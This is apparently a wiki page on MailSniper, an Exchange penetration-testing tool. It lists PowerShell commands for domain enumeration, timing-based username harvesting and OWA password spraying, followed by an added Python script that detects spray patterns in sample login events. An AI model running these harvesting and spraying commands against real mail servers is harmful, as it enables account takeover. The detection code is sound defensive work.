Revision as of 12:29, 22 February 2023
Description[1] (https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/)
MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.
Commands[2] (https://github.com/dafthack/MailSniper)
# Enumerate the NetBIOS domain name
Invoke-DomainHarvestOWA -ExchHostname mail.name.com
# Use a timing attack to validate possible usernames against the OWA server
Invoke-UsernameHarvestOWA -ExchHostname mail.name.io -Domain name.io -UserList possible.txt -OutFile valid.txt
# Password-spray the validated usernames with a single password
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234
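
Detection side of the spray and harvest commands above, as an added Python example that is not part of MailSniper or the original page: it flags a source that fails against many distinct accounts with only a few tries each, then lists accounts that logged in successfully from that source. The event format, the thresholds and the function names are assumptions; the sample events are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events, one per line: ISO time, source IP, username, outcome.
# This normalised format is an assumption, not an Exchange or IIS log format.
SAMPLE = """\
2023-02-22T12:00:01 203.0.113.7 alice FAIL
2023-02-22T12:00:02 203.0.113.7 bob FAIL
2023-02-22T12:00:03 203.0.113.7 carol OK
2023-02-22T12:00:04 203.0.113.7 dave FAIL
2023-02-22T12:00:05 203.0.113.7 erin FAIL
2023-02-22T12:00:06 203.0.113.7 frank FAIL
2023-02-22T12:01:00 198.51.100.20 bob FAIL
2023-02-22T12:01:05 198.51.100.20 bob FAIL
2023-02-22T12:02:00 192.0.2.15 alice FAIL
2023-02-22T12:02:20 192.0.2.15 alice OK
"""

def parse(text):
    rows = []
    for line in text.strip().splitlines():
        ts, ip, user, outcome = line.split()
        rows.append((datetime.fromisoformat(ts), ip, user.lower(), outcome))
    return sorted(rows)

def find_sprays(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Map source IP -> accounts it failed against, for sources whose failures
    inside `window` cover >= min_users accounts with <= max_per_user tries each."""
    recent = defaultdict(deque)  # source IP -> (time, user) failures still in window
    flagged = defaultdict(set)
    for ts, ip, user, outcome in events:
        if outcome != "FAIL":
            continue
        q = recent[ip]
        q.append((ts, user))
        while ts - q[0][0] > window:  # drop failures older than the window
            q.popleft()
        tries = defaultdict(int)
        for _, u in q:
            tries[u] += 1
        if len(tries) >= min_users and max(tries.values()) <= max_per_user:
            flagged[ip].update(tries)
    return {ip: sorted(users) for ip, users in flagged.items()}

def successes_from(events, sources):
    """Accounts that logged in successfully from a flagged source: reset these first."""
    return sorted({u for _, ip, u, o in events if o == "OK" and ip in sources})
```

The repeated failures against one account (198.51.100.20) and the single mistyped password (192.0.2.15) are not flagged, because neither touches enough distinct accounts.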